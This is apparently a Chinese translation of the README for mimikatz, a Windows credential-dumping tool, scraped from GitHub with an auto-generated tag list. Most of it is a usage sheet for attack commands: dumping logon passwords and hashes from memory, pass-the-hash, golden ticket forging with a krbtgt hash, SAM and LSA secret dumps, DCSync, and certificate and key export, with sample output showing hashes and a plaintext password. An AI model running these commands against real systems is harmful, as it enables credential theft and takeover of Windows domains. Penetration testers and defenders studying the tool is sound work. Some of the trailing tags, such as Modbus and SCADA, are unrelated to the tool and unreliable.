gentilkiwi/mimikatz
GitHub: gentilkiwi/mimikatz
Windows 凭证提取与 Kerberos 攻击的标志性安全工具,支持从内存中抓取密码、哈希、票据并执行多种域内横向移动技术。
Stars: 21309 | Forks: 4035
# mimikatz
**`mimikatz`** 是我制作的一个工具,用于学习 `C` 语言并在 Windows 安全方面进行一些实验。
它现在以从内存中提取明文密码、哈希、PIN 码和 kerberos 票据而闻名。**`mimikatz`** 还可以执行 pass-the-hash、pass-the-ticket 或构建 _Golden tickets_。
```
.#####. mimikatz 2.0 alpha (x86) release "Kiwi en C" (Apr 6 2014 22:02:03)
.## ^ ##.
## / \ ## /* * *
## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
'## v ##' https://blog.gentilkiwi.com/mimikatz (oe.eo)
'#####' with 13 modules * * */
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # sekurlsa::logonpasswords
Authentication Id : 0 ; 515764 (00000000:0007deb4)
Session : Interactive from 2
User Name : Gentil Kiwi
Domain : vm-w7-ult-x
SID : S-1-5-21-1982681256-1210654043-1600862990-1000
msv :
[00000003] Primary
* Username : Gentil Kiwi
* Domain : vm-w7-ult-x
* LM : d0e9aee149655a6075e4540af1f22d3b
* NTLM : cc36cf7a8514893efccd332446158b1a
* SHA1 : a299912f3dc7cf0023aef8e4361abfc03e9a8c30
tspkg :
* Username : Gentil Kiwi
* Domain : vm-w7-ult-x
* Password : waza1234/
...
```
但这还不是全部!`Crypto`、`Terminal Server`、`Events`……GitHub Wiki https://github.com/gentilkiwi/mimikatz/wiki 或 https://blog.gentilkiwi.com 上有大量信息(法语,_是的_)。
如果你不想自己构建,可以在此处获取二进制文件 https://github.com/gentilkiwi/mimikatz/releases
## 快速使用
```
log
privilege::debug
```
### sekurlsa
```
sekurlsa::logonpasswords
sekurlsa::tickets /export
sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd
```
### kerberos
```
kerberos::list /export
kerberos::ptt c:\chocolate.kirbi
kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi
```
### crypto
```
crypto::capi
crypto::cng
crypto::certificates /export
crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE
crypto::keys /export
crypto::keys /machine /export
```
### vault & lsadump
```
vault::cred
vault::list
token::elevate
vault::cred
vault::list
lsadump::sam
lsadump::secrets
lsadump::cache
token::revert
lsadump::dcsync /user:domain\krbtgt /domain:lab.local
```
## 构建
`mimikatz` 采用 Visual Studio Solution 和 WinDDK 驱动程序的形式(主要操作可选),因此先决条件为:
* 对于 `mimikatz` 和 `mimilib`:用于 Desktop 的 Visual Studio 2010、2012 或 2013(**2013 Express for Desktop 是免费的,且支持 x86 和 x64** - http://www.microsoft.com/download/details.aspx?id=44914)
* _对于 `mimikatz driver`、`mimilove`(以及 `ddk2003` 平台):Windows Driver Kit **7.1** (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800_
`mimikatz` 使用 `SVN` 进行源代码控制,但现在也支持 `GIT`!
你可以使用任何你喜欢的工具进行同步,甚至是 Visual Studio 2013 中内置的 `GIT` =)
### 同步!
* GIT URL 为 : https://github.com/gentilkiwi/mimikatz.git
* SVN URL 为 : https://github.com/gentilkiwi/mimikatz/trunk
* ZIP 文件为 : https://github.com/gentilkiwi/mimikatz/archive/master.zip
### 构建解决方案
* 打开解决方案后,`Build` / `Build Solution`(你可以更改架构)
* `mimikatz` 现已构建完成,随时可以使用!(`Win32` / `x64`,如果你运气好的话甚至支持 `ARM64`)
* 你可能会遇到关于 `_build_.cmd` 和 `mimidrv` 的 `MSB3073` 错误,这是因为如果没有 Windows Driver Kit **7.1** (WinDDK) 就无法构建驱动程序,但 `mimikatz` 和 `mimilib` 是没问题的。
### ddk2003
通过这个可选的 MSBuild 平台,你可以使用 WinDDK 构建工具和默认的 `msvcrt` 运行时(二进制文件更小,无依赖项)
对于这个可选平台,Windows Driver Kit **7.1** (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800 和 Visual Studio **2010** 是必须的,即使你计划之后使用 Visual Studio 2012 或 2013。
请遵循以下说明:
* https://blog.gentilkiwi.com/programmation/executables-runtime-defaut-systeme
* _https://blog.gentilkiwi.com/cryptographie/api-systemfunction-windows#winheader_
## 持续集成
`mimikatz` 项目可在 AppVeyor 上找到 - https://ci.appveyor.com/project/gentilkiwi/mimikatz
其状态为:
## 许可证
CC BY 4.0 许可证 - https://creativecommons.org/licenses/by/4.0/
`mimikatz` 的开发需要咖啡支持:
* PayPal: https://www.paypal.me/delpy/
## 作者
* Benjamin DELPY `gentilkiwi`,你可以在 Twitter ( @gentilkiwi ) 上联系我,或通过邮件 ( benjamin [at] gentilkiwi.com )
* `lsadump` 模块中的 DCSync 和 DCShadow 功能是与 Vincent LE TOUX 合写的,你可以通过邮件 ( vincent.letoux [at] gmail.com ) 联系他或访问他的网站 ( http://www.mysmartlogon.com )
这是一个**个人**开发项目,请尊重其理念,不要将其用于坏事!
标签:Conpot, CTF学习, CTF工具, HTTP, Kerberos攻击, LSASS内存, Mimikatz, Modbus, SCADA, Windows内核, Windows安全, 内网渗透, 凭据转储, 协议分析, 哈希传递, 客户端加密, 客户端加密, 密码提取, 攻击路径可视化, 权限提升, 模拟器, 横向移动, 漏洞搜索, 白帽子, 票据传递, 端点可见性, 编程规范, 网络安全, 隐私保护, 黄金票据, 黑客工具